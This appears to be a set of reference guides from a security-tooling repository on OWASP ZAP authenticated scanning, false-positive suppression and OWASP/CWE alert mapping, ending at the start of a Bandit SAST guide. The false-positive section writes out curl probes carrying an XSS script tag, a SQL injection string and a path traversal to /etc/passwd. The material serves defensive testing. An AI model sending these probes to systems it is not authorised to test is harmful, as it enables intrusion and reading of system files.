python3 scripts/zap_api_scan.py --target https://api.example.com/v1 \
--spec openapi-v1.yaml
# v2
python3 scripts/zap_api_scan.py --target https://api.example.com/v2 \
--spec openapi-v2.yaml
```
## Troubleshooting API Scans
### Issue: OpenAPI Import Fails
**Solution:** Validate OpenAPI spec:
```bash
# Use Swagger Editor or openapi-validator
npx @apidevtools/swagger-cli validate openapi.yaml
```
### Issue: Authentication Not Working
**Solution:** Test authentication manually first:
```bash
curl -v https://api.example.com/protected-endpoint \
-H "Authorization: Bearer $TOKEN"
```
### Issue: Rate Limiting During Scan
**Solution:** Reduce scan speed:
```bash
docker run -t zaproxy/zap-stable zap-api-scan.py \
-t https://api.example.com -f openapi -d /zap/wrk/spec.yaml \
-z "-config scanner.delayInMs=1000"
```
## Additional Resources
- [OWASP API Security Top 10](https://owasp.org/www-project-api-security/)
- [REST API Security Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/REST_Security_Cheat_Sheet.html)
- [GraphQL Security](https://graphql.org/learn/authorization/)
- [ZAP OpenAPI Add-on](https://www.zaproxy.org/docs/desktop/addons/openapi-support/)

View File

@@ -0,0 +1,431 @@
# ZAP Authentication Configuration Guide
Comprehensive guide for configuring authenticated scanning in OWASP ZAP for form-based, token-based, and OAuth authentication.
## Overview
Authenticated scanning is critical for testing protected application areas that require login. ZAP supports multiple authentication methods:
- **Form-Based Authentication** - Traditional username/password login forms
- **HTTP Authentication** - Basic, Digest, NTLM authentication
- **Script-Based Authentication** - Custom authentication flows (OAuth, SAML)
- **Token-Based Authentication** - Bearer tokens, API keys, JWT
## Form-Based Authentication
### Configuration Steps
1. **Identify Login Parameters**
- Login URL
- Username field name
- Password field name
- Submit button/action
2. **Create Authentication Context**
```bash
# Use bundled script
python3 scripts/zap_auth_scanner.py \
--target https://app.example.com \
--auth-type form \
--login-url https://app.example.com/login \
--username testuser \
--password-env APP_PASSWORD \
--verification-url https://app.example.com/dashboard \
--output authenticated-scan-report.html
```
3. **Configure Logged-In Indicator**
Specify a regex pattern that appears only when logged in:
- Example: `Welcome, testuser`
- Example: `<a href="/logout">Logout</a>`
- Example: Check for presence of dashboard elements
### Manual Context Configuration
Create `auth-context.xml`:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<context>
<name>WebAppAuth</name>
<desc>Authenticated scanning context</desc>
<inscope>true</inscope>
<incregexes>https://app\.example\.com/.*</incregexes>
<authentication>
<type>formBasedAuthentication</type>
<form>
<loginurl>https://app.example.com/login</loginurl>
<loginbody>username={%username%}&amp;password={%password%}</loginbody>
<loginpageurl>https://app.example.com/login</loginpageurl>
</form>
<loggedin>\QWelcome,\E</loggedin>
<loggedout>\QYou are not logged in\E</loggedout>
</authentication>
<users>
<user>
<name>testuser</name>
<credentials>
<credential>
<name>username</name>
<value>testuser</value>
</credential>
<credential>
<name>password</name>
<value>SecureP@ssw0rd</value>
</credential>
</credentials>
<enabled>true</enabled>
</user>
</users>
<sessionManagement>
<type>cookieBasedSessionManagement</type>
</sessionManagement>
</context>
</configuration>
```
Run scan with context:
```bash
docker run --rm \
-v $(pwd):/zap/wrk/:rw \
-t zaproxy/zap-stable \
zap-full-scan.py \
-t https://app.example.com \
-n /zap/wrk/auth-context.xml \
-r /zap/wrk/auth-report.html
```
## Token-Based Authentication (Bearer Tokens)
### JWT/Bearer Token Configuration
1. **Obtain Authentication Token**
```bash
# Example: Login to get token
TOKEN=$(curl -X POST https://api.example.com/auth/login \
-H "Content-Type: application/json" \
-d '{"username":"testuser","password":"password"}' \
| jq -r '.token')
```
2. **Configure ZAP to Include Token**
Use ZAP Replacer to add Authorization header:
```bash
python3 scripts/zap_auth_scanner.py \
--target https://api.example.com \
--auth-type bearer \
--token-env API_TOKEN \
--output api-auth-scan.html
```
### Manual Token Configuration
Using ZAP automation framework (`zap_automation.yaml`):
```yaml
env:
contexts:
- name: API-Context
urls:
- https://api.example.com
authentication:
method: header
parameters:
header: Authorization
value: "Bearer ${API_TOKEN}"
sessionManagement:
method: cookie
jobs:
- type: spider
parameters:
context: API-Context
user: api-user
- type: activeScan
parameters:
context: API-Context
user: api-user
```
## OAuth 2.0 Authentication
### Authorization Code Flow
1. **Manual Browser-Based Token Acquisition**
```bash
# Step 1: Get authorization code (open in browser)
https://oauth.example.com/authorize?
client_id=YOUR_CLIENT_ID&
redirect_uri=http://localhost:8080/callback&
response_type=code&
scope=openid profile
# Step 2: Exchange code for token
TOKEN=$(curl -X POST https://oauth.example.com/token \
-d "grant_type=authorization_code" \
-d "code=AUTH_CODE_FROM_STEP_1" \
-d "client_id=YOUR_CLIENT_ID" \
-d "client_secret=YOUR_CLIENT_SECRET" \
-d "redirect_uri=http://localhost:8080/callback" \
| jq -r '.access_token')
# Step 3: Use token in ZAP scan
export API_TOKEN="$TOKEN"
python3 scripts/zap_auth_scanner.py \
--target https://api.example.com \
--auth-type bearer \
--token-env API_TOKEN
```
### Client Credentials Flow (Service-to-Service)
```bash
# Obtain token using client credentials
TOKEN=$(curl -X POST https://oauth.example.com/token \
-d "grant_type=client_credentials" \
-d "client_id=YOUR_CLIENT_ID" \
-d "client_secret=YOUR_CLIENT_SECRET" \
-d "scope=api.read api.write" \
| jq -r '.access_token')
export API_TOKEN="$TOKEN"
# Run authenticated scan
python3 scripts/zap_auth_scanner.py \
--target https://api.example.com \
--auth-type bearer \
--token-env API_TOKEN
```
## HTTP Basic/Digest Authentication
### Basic Authentication
```bash
# Option 1: Using environment variable
export BASIC_AUTH="dGVzdHVzZXI6cGFzc3dvcmQ=" # base64(testuser:password)
# Option 2: Using script
python3 scripts/zap_auth_scanner.py \
--target https://app.example.com \
--auth-type http \
--username testuser \
--password-env HTTP_PASSWORD
```
### Digest Authentication
Similar to Basic, but ZAP automatically handles the challenge-response:
```bash
docker run --rm \
-v $(pwd):/zap/wrk/:rw \
-t zaproxy/zap-stable \
zap-full-scan.py \
-t https://app.example.com \
-n /zap/wrk/digest-auth-context.xml \
-r /zap/wrk/digest-auth-report.html
```
## Session Management
### Cookie-Based Sessions
**Default Behavior:** ZAP automatically manages cookies.
**Custom Configuration:**
- Set session cookie name in context
- Configure session timeout
- Define re-authentication triggers
### Token Refresh Handling
For tokens that expire during scan:
```yaml
# zap_automation.yaml
env:
contexts:
- name: API-Context
authentication:
method: script
parameters:
script: |
// JavaScript to refresh token
function authenticate(helper, paramsValues, credentials) {
var loginUrl = "https://api.example.com/auth/login";
var postData = '{"username":"' + credentials.getParam("username") +
'","password":"' + credentials.getParam("password") + '"}';
var msg = helper.prepareMessage();
msg.setRequestHeader("POST " + loginUrl + " HTTP/1.1");
msg.setRequestBody(postData);
helper.sendAndReceive(msg);
var response = msg.getResponseBody().toString();
var token = JSON.parse(response).token;
// Store token for use in requests
helper.getHttpSender().setRequestHeader("Authorization", "Bearer " + token);
return msg;
}
```
## Verification and Troubleshooting
### Verify Authentication is Working
1. **Check Logged-In Indicator**
Run a spider scan and verify protected pages are accessed:
```bash
# Look for dashboard, profile, or other authenticated pages in spider results
```
2. **Monitor Authentication Requests**
Enable ZAP logging to see authentication attempts:
```bash
docker run --rm \
-v $(pwd):/zap/wrk/:rw \
-e ZAP_LOG_LEVEL=DEBUG \
-t zaproxy/zap-stable \
zap-full-scan.py -t https://app.example.com -n /zap/wrk/context.xml
```
3. **Test with Manual Request**
Send a manual authenticated request via ZAP GUI or API to verify credentials work.
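Steps 1 and 3 can also be scripted against the ZAP Python API (`pip install python-owasp-zap-v2.4`); a sketch, with placeholder URLs, that spiders the target and checks that known authenticated-only pages were reached (use `spider.scan_as_user` for user-scoped crawls):
```python
import time
from zapv2 import ZAPv2  # pip install python-owasp-zap-v2.4

zap = ZAPv2(apikey="changeme", proxies={"http": "http://127.0.0.1:8080",
                                        "https": "http://127.0.0.1:8080"})

target = "https://app.example.com"
scan_id = zap.spider.scan(target)
while int(zap.spider.status(scan_id)) < 100:
    time.sleep(2)

found = set(zap.spider.results(scan_id))
expected = {f"{target}/dashboard", f"{target}/profile"}  # authenticated-only pages
missing = expected - found
if missing:
    print("[!] Authenticated pages not reached; authentication may be failing:", missing)
else:
    print("Authenticated pages reached during spider; authentication looks OK")
```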
### Common Authentication Issues
#### Issue: Session Expires During Scan
**Solution:** Configure re-authentication:
```bash
# Add re-authentication options when invoking zap_auth_scanner.py
python3 scripts/zap_auth_scanner.py \
--target https://app.example.com \
--re-authenticate-on 401,403 \
--verification-interval 300 # Re-verify the session every 5 minutes
```
#### Issue: CSRF Tokens Required
**Solution:** Use anti-CSRF token handling:
```yaml
# zap_automation.yaml
env:
contexts:
- name: WebApp
authentication:
verification:
method: response
loggedInRegex: "\\QWelcome\\E"
sessionManagement:
method: cookie
parameters:
antiCsrfTokens: true
```
#### Issue: Rate Limiting Blocking Authentication
**Solution:** Slow down scan:
```bash
docker run -t zaproxy/zap-stable zap-full-scan.py \
-t https://app.example.com \
-z "-config scanner.delayInMs=2000 -config scanner.threadPerHost=1"
```
#### Issue: Multi-Step Login (MFA)
**Solution:** Use script-based authentication with Selenium or manual token acquisition.
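A sketch of the manual-acquisition route, assuming Selenium and a login form with `username`/`password` fields: drive the first factor, pause while a human completes MFA, then export the session cookies for ZAP:
```python
import os
from selenium import webdriver
from selenium.webdriver.common.by import By

driver = webdriver.Firefox()  # or webdriver.Chrome()
driver.get("https://app.example.com/login")
driver.find_element(By.NAME, "username").send_keys("testuser")
driver.find_element(By.NAME, "password").send_keys(os.environ["APP_PASSWORD"])
driver.find_element(By.CSS_SELECTOR, "button[type='submit']").click()

input("Complete the MFA challenge in the browser, then press Enter to continue...")

# Hand the authenticated session cookies to ZAP (e.g. via a Replacer rule or the context)
for cookie in driver.get_cookies():
    print(f"{cookie['name']}={cookie['value']}")
driver.quit()
```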
## Security Best Practices
1. **Never Hardcode Credentials**
- Use environment variables
- Use secrets management tools (Vault, AWS Secrets Manager)
2. **Use Dedicated Test Accounts**
- Create accounts specifically for security testing
- Limit permissions to test data only
- Monitor for abuse
3. **Rotate Credentials Regularly**
- Change test account passwords after each scan
- Rotate API tokens frequently
4. **Log Authentication Attempts**
- Monitor for failed authentication attempts
- Alert on unusual patterns
5. **Secure Context Files**
- Never commit context files with credentials to version control
- Use `.gitignore` to exclude `*.context` files
- Encrypt context files at rest
## Examples by Framework
### Django Application
```bash
# Django CSRF token handling
python3 scripts/zap_auth_scanner.py \
--target https://django-app.example.com \
--auth-type form \
--login-url https://django-app.example.com/accounts/login/ \
--username testuser \
--password-env DJANGO_PASSWORD \
--verification-url https://django-app.example.com/dashboard/
```
### Spring Boot Application
```bash
# Spring Security form login
python3 scripts/zap_auth_scanner.py \
--target https://spring-app.example.com \
--auth-type form \
--login-url https://spring-app.example.com/login \
--username testuser \
--password-env SPRING_PASSWORD
```
### React SPA with JWT
```bash
# Get JWT from API, then scan
TOKEN=$(curl -X POST https://api.example.com/auth/login \
-H "Content-Type: application/json" \
-d '{"email":"test@example.com","password":"password"}' \
| jq -r '.token')
export API_TOKEN="$TOKEN"
python3 scripts/zap_auth_scanner.py \
--target https://spa.example.com \
--auth-type bearer \
--token-env API_TOKEN
```
## Additional Resources
- [ZAP Authentication Documentation](https://www.zaproxy.org/docs/desktop/start/features/authentication/)
- [ZAP Session Management](https://www.zaproxy.org/docs/desktop/start/features/sessionmanagement/)
- [OAuth 2.0 RFC 6749](https://tools.ietf.org/html/rfc6749)

View File

@@ -0,0 +1,427 @@
# ZAP False Positive Handling Guide
Guide for identifying, verifying, and suppressing false positives in OWASP ZAP scan results.
## Overview
DAST tools like ZAP generate false positives - alerts for issues that aren't actually exploitable vulnerabilities. This guide helps you:
1. Identify common false positives
2. Verify findings manually
3. Suppress false positives in future scans
4. Tune scan policies
## Common False Positives
### 1. X-Content-Type-Options Missing
**Alert:** Missing X-Content-Type-Options header
**False Positive Scenario:**
- Static content served by CDNs
- Third-party resources
- Legacy browsers not supported
**Verification:**
```bash
curl -I https://example.com/static/script.js
# Without X-Content-Type-Options, browsers may MIME-sniff the returned Content-Type
```
**When to Suppress:**
- Static content only (CSS, JS, images)
- Content served from trusted CDN
- No user-controlled content in responses
**Suppression Rule:**
```tsv
10021 https://cdn.example.com/.* .* 693 IGNORE
```
### 2. Cookie Without Secure Flag
**Alert:** Cookie without Secure flag set
**False Positive Scenario:**
- Development/testing environments (HTTP)
- Non-sensitive cookies (analytics, preferences)
- Localhost testing
**Verification:**
```bash
curl -I https://example.com
# Check Set-Cookie headers
# Verify if cookie contains sensitive data
```
**When to Suppress:**
- Non-sensitive cookies (theme preference, language)
- HTTP-only development environments
- Third-party analytics cookies
**Suppression Rule:**
```tsv
10054 https://example.com.* _ga|_gid|theme 614 WARN
```
### 3. Cross-Domain JavaScript Source File Inclusion
**Alert:** JavaScript loaded from external domain
**False Positive Scenario:**
- Legitimate CDN usage (jQuery, Bootstrap, etc.)
- Third-party integrations (Google Analytics, Stripe)
- Using Subresource Integrity (SRI)
**Verification:**
```html
<!-- Check if SRI is used -->
<script src="https://cdn.example.com/library.js"
integrity="sha384-HASH"
crossorigin="anonymous"></script>
```
**When to Suppress:**
- CDN resources with SRI
- Trusted third-party services
- Company-owned CDN domains
**Suppression Rule:**
```tsv
10017 https://example.com/.* https://cdn.jsdelivr.net/.* 829 IGNORE
```
### 4. Timestamp Disclosure
**Alert:** Unix timestamps found in response
**False Positive Scenario:**
- Legitimate timestamp fields in API responses
- Non-sensitive metadata
- Public timestamps (post dates, etc.)
**Verification:**
```json
{
"created_at": 1640995200, // Legitimate field
"post_date": "2022-01-01"
}
```
**When to Suppress:**
- API responses with datetime fields
- Public-facing timestamps
- Non-sensitive metadata
**Suppression Rule:**
```tsv
10096 https://api.example.com/.* created_at|updated_at 200 IGNORE
```
### 5. Server Version Disclosure
**Alert:** Server version exposed in headers
**False Positive Scenario:**
- Behind WAF/load balancer (version is of proxy, not app server)
- Generic server headers
- Already public knowledge
**Verification:**
```bash
curl -I https://example.com | grep Server
# Check if version matches actual server
```
**When to Suppress:**
- Proxy/WAF version (not actual app server)
- Generic headers without version numbers
- When other compensating controls exist
**Suppression Rule:**
```tsv
10036 https://example.com.* .* 200 WARN
```
## Verification Methodology
### Step 1: Understand the Alert
Review ZAP alert details:
- **Description:** What is the potential vulnerability?
- **Evidence:** What triggered the alert?
- **CWE/OWASP Mapping:** What category does it fall under?
- **Risk Level:** How severe is it?
### Step 2: Reproduce Manually
Attempt to exploit the vulnerability:
```bash
# For XSS alerts
curl "https://example.com/search?q=<script>alert(1)</script>"
# Check if script is reflected unencoded
# For SQL injection alerts
curl "https://example.com/api/user?id=1' OR '1'='1"
# Check for SQL errors or unexpected behavior
# For path traversal alerts
curl "https://example.com/download?file=../../etc/passwd"
# Check if file is accessible
```
### Step 3: Check Context
Consider the application context:
- Is the functionality available to unauthenticated users?
- Does it handle sensitive data?
- Are there compensating controls (WAF, input validation)?
### Step 4: Document Decision
Create documentation for suppression decisions:
```markdown
## Alert: SQL Injection in /api/user
**Decision:** False Positive
**Rationale:**
- Endpoint requires authentication
- Input is validated server-side (allowlist: 0-9 only)
- WAF rule blocks SQL injection patterns
- Manual testing confirmed no injection possible
**Suppressed:** Yes (Rule ID 40018, /api/user endpoint)
**Reviewed by:** security-team@example.com
**Date:** 2024-01-15
```
## Creating Suppression Rules
### Rules File Format
ZAP uses TSV (tab-separated values) format:
```
alert_id URL_pattern parameter CWE_id action
```
- **alert_id:** ZAP alert ID (e.g., 40018 for SQL Injection)
- **URL_pattern:** Regex pattern for URL
- **parameter:** Parameter name (or .* for all)
- **CWE_id:** CWE identifier
- **action:** IGNORE, WARN, or FAIL
### Example Rules File
`.zap/rules.tsv`:
```tsv
# Suppress X-Content-Type-Options for CDN static content
10021 https://cdn.example.com/static/.* .* 693 IGNORE
# Warn (don't fail) on analytics cookies without Secure flag
10054 https://example.com/.* _ga|_gid 614 WARN
# Ignore timestamp disclosure in API responses
10096 https://api.example.com/.* .* 200 IGNORE
# Ignore legitimate external JavaScript (with SRI)
10017 https://example.com/.* https://cdn.jsdelivr.net/.* 829 IGNORE
# Suppress CSRF warnings for stateless API
10202 https://api.example.com/.* .* 352 IGNORE
```
### Using Rules File
```bash
# Baseline scan with rules
docker run -t zaproxy/zap-stable zap-baseline.py \
-t https://example.com \
-c .zap/rules.tsv \
-r report.html
# Full scan with rules
docker run -v $(pwd):/zap/wrk/:rw -t zaproxy/zap-stable zap-full-scan.py \
-t https://example.com \
-c /zap/wrk/.zap/rules.tsv \
-r /zap/wrk/report.html
```
## Custom Scan Policies
### Disable Entire Scan Rules
Create custom scan policy to disable problematic rules:
1. **Via ZAP GUI:**
- Analyze > Scan Policy Manager
- Create new policy
- Disable specific rules
- Export policy file
2. **Via Automation Framework:**
```yaml
# zap_automation.yaml
jobs:
- type: activeScan
parameters:
policy: Custom-Policy
rules:
- id: 40018 # SQL Injection
threshold: MEDIUM
strength: HIGH
- id: 10202 # CSRF
threshold: OFF # Disable completely
```
## Handling Different Alert Types
### High-Risk Alerts (Never Suppress Without Verification)
- SQL Injection
- Command Injection
- Remote Code Execution
- Authentication Bypass
- Server-Side Request Forgery (SSRF)
**Process:**
1. Manual verification required
2. Security team review
3. Document compensating controls
4. Re-test after fixes
### Medium-Risk Alerts (Contextual Suppression)
- XSS (if output is properly encoded)
- CSRF (if tokens are implemented)
- Missing headers (if compensating controls exist)
**Process:**
1. Verify finding
2. Check for compensating controls
3. Document decision
4. Suppress with WARN (not IGNORE)
### Low-Risk Alerts (Can Be Suppressed)
- Informational headers
- Timestamp disclosure
- Technology fingerprinting
**Process:**
1. Quick verification
2. Document reason
3. Suppress with IGNORE
## Quality Assurance
### Review Suppression Rules Regularly
Monthly review checklist:
- [ ] Review all suppression rules for continued relevance
- [ ] Check if suppressed issues have been fixed
- [ ] Verify compensating controls are still in place
- [ ] Update rules file with new false positives
### Track Suppression Metrics
Monitor suppression trends:
```bash
# Count suppressions by alert type
grep -v '^#' .zap/rules.tsv | awk '{print $1}' | sort | uniq -c
# Alert if suppression count increases significantly
```
### Peer Review Process
Require security team approval for suppressing high-risk alerts:
```yaml
# .github/workflows/security-review.yml
- name: Check for new suppressions
run: |
git diff origin/main .zap/rules.tsv > suppressions.diff
if [ -s suppressions.diff ]; then
echo "New suppressions require security team review"
# Notify security team
fi
```
## Anti-Patterns to Avoid
### ❌ Don't Suppress Everything
Never create blanket suppression rules:
```tsv
# BAD: Suppresses all XSS findings
40012 .* .* 79 IGNORE
```
### ❌ Don't Suppress Without Documentation
Always document why a finding is suppressed:
```tsv
# BAD: No context
10054 https://example.com/.* session_id 614 IGNORE
# GOOD: Documented reason
# Session cookie is HTTPS-only in production; suppressing for staging environment
10054 https://staging.example.com/.* session_id 614 IGNORE
```
### ❌ Don't Ignore High-Risk Findings
Never suppress critical vulnerabilities without thorough investigation:
```tsv
# DANGEROUS: Never suppress SQL injection without verification
40018 https://example.com/.* .* 89 IGNORE
```
## Tools and Scripts
### Analyze ZAP JSON Report
```python
#!/usr/bin/env python3
import json
import sys
report_path = sys.argv[1] if len(sys.argv) > 1 else 'report.json'
with open(report_path) as f:
    report = json.load(f)
for site in report['site']:
for alert in site['alerts']:
if alert['risk'] in ['High', 'Medium']:
print(f"{alert['alert']} - {alert['risk']}")
print(f" URL: {alert['url']}")
print(f" Evidence: {alert.get('evidence', 'N/A')}")
print()
```
### Generate Suppression Rules Template
```bash
# Extract unique alert IDs from report
jq -r '.site[].alerts[] | "\(.pluginid)\t\(.url)\t.*\t\(.cweid)\tWARN"' report.json \
| sort -u > rules-template.tsv
```
## Additional Resources
- [ZAP Alert Details](https://www.zaproxy.org/docs/alerts/)
- [ZAP Scan Rules](https://www.zaproxy.org/docs/docker/baseline-scan/)
- [OWASP Testing Guide](https://owasp.org/www-project-web-security-testing-guide/)

View File

@@ -0,0 +1,255 @@
# OWASP ZAP Alert Mapping to OWASP Top 10 2021 and CWE
This reference maps common OWASP ZAP alerts to OWASP Top 10 2021 categories and CWE (Common Weakness Enumeration) identifiers for compliance and reporting.
## OWASP Top 10 2021 Coverage
### A01:2021 - Broken Access Control
**ZAP Alerts:**
- Path Traversal (CWE-22)
- Directory Browsing (CWE-548)
- Cross-Domain Misconfiguration (CWE-346)
- Bypassing Access Controls (CWE-284)
**Risk Level:** High to Medium
**Remediation:**
- Implement proper access control checks on server-side
- Use allowlists for file access patterns
- Disable directory listing
- Enforce CORS policies strictly
### A02:2021 - Cryptographic Failures
**ZAP Alerts:**
- Weak SSL/TLS Ciphers (CWE-327)
- Cookie Without Secure Flag (CWE-614)
- Password Autocomplete (CWE-522)
- Sensitive Information in URL (CWE-598)
**Risk Level:** High to Medium
**Remediation:**
- Use TLS 1.2+ with strong cipher suites
- Set Secure and HttpOnly flags on all cookies
- Disable autocomplete for sensitive fields
- Never transmit sensitive data in URLs
### A03:2021 - Injection
**ZAP Alerts:**
- SQL Injection (CWE-89)
- Cross-Site Scripting (XSS) (CWE-79)
- Command Injection (CWE-78)
- LDAP Injection (CWE-90)
- XML Injection (CWE-91)
- XPath Injection (CWE-643)
**Risk Level:** High
**Remediation:**
- Use parameterized queries (prepared statements)
- Implement context-aware output encoding
- Validate and sanitize all user input
- Use allowlists for input validation
- Implement Content Security Policy (CSP)
### A04:2021 - Insecure Design
**ZAP Alerts:**
- Application Error Disclosure (CWE-209)
- Insufficient Anti-automation (CWE-799)
- Missing Rate Limiting
**Risk Level:** Medium to Low
**Remediation:**
- Implement proper error handling (generic error messages)
- Add CAPTCHA or rate limiting for sensitive operations
- Design security controls during architecture phase
- Implement anti-automation measures
### A05:2021 - Security Misconfiguration
**ZAP Alerts:**
- Missing Security Headers (CWE-693)
- X-Content-Type-Options
- X-Frame-Options (CWE-1021)
- Content-Security-Policy
- Strict-Transport-Security (HSTS)
- Server Leaks Information (CWE-200)
- Default Credentials
- Unnecessary HTTP Methods Enabled (CWE-650)
**Risk Level:** Medium to Low
**Remediation:**
- Configure all security headers properly
- Remove server version headers
- Disable unnecessary HTTP methods (PUT, DELETE, TRACE)
- Change default credentials
- Implement minimal privilege principle
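As an illustration of the header items above, a minimal Flask sketch that sets the headers ZAP checks for (values are examples; tune the CSP to the application):
```python
from flask import Flask

app = Flask(__name__)

@app.after_request
def set_security_headers(response):
    # Headers corresponding to the A05 alerts listed above
    response.headers["X-Content-Type-Options"] = "nosniff"
    response.headers["X-Frame-Options"] = "DENY"
    response.headers["Content-Security-Policy"] = "default-src 'self'"
    response.headers["Strict-Transport-Security"] = "max-age=31536000; includeSubDomains"
    return response
```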
### A06:2021 - Vulnerable and Outdated Components
**ZAP Alerts:**
- Outdated Software Version Detected
- Known Vulnerable Components (requires integration with CVE databases)
**Risk Level:** High to Medium
**Remediation:**
- Maintain software inventory
- Regularly update dependencies and libraries
- Subscribe to security advisories
- Use dependency scanning tools (OWASP Dependency-Check, Snyk)
### A07:2021 - Identification and Authentication Failures
**ZAP Alerts:**
- Weak Authentication (CWE-287)
- Session Fixation (CWE-384)
- Session ID in URL Rewrite (CWE-598)
- Cookie No HttpOnly Flag (CWE-1004)
- Credential Enumeration (CWE-209)
**Risk Level:** High
**Remediation:**
- Implement multi-factor authentication (MFA)
- Use secure session management
- Regenerate session IDs after login
- Set HttpOnly and Secure flags on session cookies
- Implement account lockout mechanisms
- Use generic error messages for authentication failures
### A08:2021 - Software and Data Integrity Failures
**ZAP Alerts:**
- Missing Subresource Integrity (SRI) (CWE-353)
- Insecure Deserialization (CWE-502)
**Risk Level:** High to Medium
**Remediation:**
- Implement Subresource Integrity for CDN resources
- Avoid deserializing untrusted data
- Use digital signatures for critical data
- Implement integrity checks
### A09:2021 - Security Logging and Monitoring Failures
**ZAP Alerts:**
- Authentication attempts not logged
- No monitoring of security events
**Risk Level:** Low (detection issue, not vulnerability)
**Remediation:**
- Log all authentication attempts
- Monitor for security anomalies
- Implement centralized logging
- Set up alerts for suspicious activities
### A10:2021 - Server-Side Request Forgery (SSRF)
**ZAP Alerts:**
- Server-Side Request Forgery (CWE-918)
- External Redirect (CWE-601)
**Risk Level:** High
**Remediation:**
- Validate and sanitize all URLs
- Use allowlists for allowed domains
- Disable unnecessary URL schemas (file://, gopher://)
- Implement network segmentation
## ZAP Alert ID to OWASP/CWE Quick Reference
| Alert ID | Alert Name | OWASP 2021 | CWE | Risk |
|----------|-----------|------------|-----|------|
| 40018 | SQL Injection | A03 | CWE-89 | High |
| 40012 | Cross-Site Scripting (Reflected) | A03 | CWE-79 | High |
| 40014 | Cross-Site Scripting (Persistent) | A03 | CWE-79 | High |
| 40013 | Cross-Site Scripting (DOM) | A03 | CWE-79 | High |
| 6 | Path Traversal | A01 | CWE-22 | High |
| 7 | Remote File Inclusion | A01 | CWE-98 | High |
| 90019 | Server-Side Code Injection | A03 | CWE-94 | High |
| 90020 | Remote OS Command Injection | A03 | CWE-78 | High |
| 90033 | Loosely Scoped Cookie | A07 | CWE-565 | Medium |
| 10021 | X-Content-Type-Options Missing | A05 | CWE-693 | Low |
| 10020 | X-Frame-Options Missing | A05 | CWE-1021 | Medium |
| 10038 | Content Security Policy Missing | A05 | CWE-693 | Medium |
| 10035 | Strict-Transport-Security Missing | A05 | CWE-319 | Low |
| 10054 | Cookie Without Secure Flag | A02 | CWE-614 | Medium |
| 10010 | Cookie No HttpOnly Flag | A07 | CWE-1004 | Medium |
| 10098 | Cross-Domain Misconfiguration | A01 | CWE-346 | Medium |
| 10055 | CSP Scanner: Wildcard Directive | A05 | CWE-693 | Medium |
| 10096 | Timestamp Disclosure | A05 | CWE-200 | Low |
| 10049 | Weak Authentication Method | A07 | CWE-287 | Medium |
| 40029 | Server-Side Request Forgery | A10 | CWE-918 | High |
## Risk Level Priority Matrix
### High Risk (Immediate Action Required)
- SQL Injection
- Remote Code Execution
- Authentication Bypass
- SSRF
- XXE (XML External Entity)
### Medium Risk (Fix in Current Sprint)
- XSS (Cross-Site Scripting)
- CSRF (Cross-Site Request Forgery)
- Missing Security Headers (CSP, X-Frame-Options)
- Insecure Cookie Configuration
- Path Traversal (with limited impact)
### Low Risk (Fix in Backlog)
- Information Disclosure (version headers)
- Missing Informational Headers
- Timestamp Disclosure
- Autocomplete on Form Fields
### Informational (Documentation/Awareness)
- Server Technology Disclosure
- Application Error Messages
- Charset Mismatch
## Compliance Mapping
### PCI-DSS 3.2.1
- **Requirement 6.5.1** (Injection): SQL Injection, Command Injection, XSS
- **Requirement 6.5.3** (Insecure Cryptography): Weak SSL/TLS, Insecure Cookies
- **Requirement 6.5.7** (XSS): All XSS variants
- **Requirement 6.5.8** (Access Control): Path Traversal, Broken Access Control
- **Requirement 6.5.10** (Authentication): Weak Authentication, Session Management
### NIST 800-53
- **AC-3** (Access Enforcement): Path Traversal, Authorization Issues
- **IA-5** (Authenticator Management): Weak Authentication
- **SC-8** (Transmission Confidentiality): Missing HTTPS, Weak TLS
- **SI-10** (Information Input Validation): All Injection Flaws
### GDPR
- **Article 32** (Security of Processing): All High/Medium findings affecting data security
- **Article 25** (Data Protection by Design): Security Misconfigurations
## Usage in Reports
When generating compliance reports, reference this mapping to:
1. **Categorize findings** by OWASP Top 10 category
2. **Assign CWE IDs** for standardized vulnerability classification
3. **Map to compliance requirements** for audit trails
4. **Prioritize remediation** based on risk level and compliance impact
5. **Track metrics** by OWASP category over time
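A sketch, assuming the traditional-json report layout used elsewhere in this skill, that rolls alert counts up to OWASP Top 10 categories using the quick-reference table above (only a subset of IDs mapped for brevity):
```python
import json
from collections import Counter

# Subset of the Alert ID -> OWASP 2021 mapping from the table above
OWASP_BY_PLUGIN = {
    "40018": "A03", "40012": "A03", "40014": "A03", "40013": "A03",
    "6": "A01", "7": "A01", "90019": "A03", "90020": "A03",
    "10021": "A05", "10020": "A05", "10038": "A05", "10035": "A05",
    "10054": "A02", "10010": "A07", "10098": "A01", "10096": "A05",
    "40029": "A10",
}

with open("security-report.json") as f:
    report = json.load(f)

counts = Counter(
    OWASP_BY_PLUGIN.get(alert["pluginid"], "Unmapped")
    for site in report["site"]
    for alert in site["alerts"]
)
for category, count in sorted(counts.items()):
    print(f"{category}: {count}")
```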
## Additional Resources
- [OWASP Top 10 2021](https://owasp.org/Top10/)
- [CWE Top 25](https://cwe.mitre.org/top25/)
- [ZAP Alert Details](https://www.zaproxy.org/docs/alerts/)
- [OWASP Testing Guide](https://owasp.org/www-project-web-security-testing-guide/)

View File

@@ -0,0 +1,305 @@
---
name: sast-bandit
description: >
Python security vulnerability detection using Bandit SAST with CWE and OWASP mapping.
Use when: (1) Scanning Python code for security vulnerabilities and anti-patterns,
(2) Identifying hardcoded secrets, SQL injection, command injection, and insecure APIs,
(3) Generating security reports with severity classifications for CI/CD pipelines,
(4) Providing remediation guidance with security framework references,
(5) Enforcing Python security best practices in development workflows.
version: 0.1.0
maintainer: SirAppSec
category: appsec
tags: [sast, bandit, python, vulnerability-scanning, owasp, cwe, security-linting]
frameworks: [OWASP, CWE]
dependencies:
python: ">=3.8"
packages: [bandit]
references:
- https://github.com/PyCQA/bandit
- https://bandit.readthedocs.io/
- https://owasp.org/www-project-top-ten/
---
# Bandit Python SAST
## Overview
Bandit is a security-focused static analysis tool for Python that identifies common security vulnerabilities and coding anti-patterns. It parses Python code into Abstract Syntax Trees (AST) and executes security plugins to detect issues like hardcoded credentials, SQL injection, command injection, weak cryptography, and insecure API usage. Bandit provides actionable reports with severity classifications aligned to industry security standards.
## Quick Start
Scan a Python file or directory for security vulnerabilities:
```bash
# Install Bandit
pip install bandit
# Scan single file
bandit suspicious_file.py
# Scan entire directory recursively
bandit -r /path/to/python/project
# Generate JSON report
bandit -r project/ -f json -o bandit_report.json
# Scan with custom config
bandit -r project/ -c .bandit.yaml
```
## Core Workflow
### Step 1: Install and Configure Bandit
Install Bandit via pip:
```bash
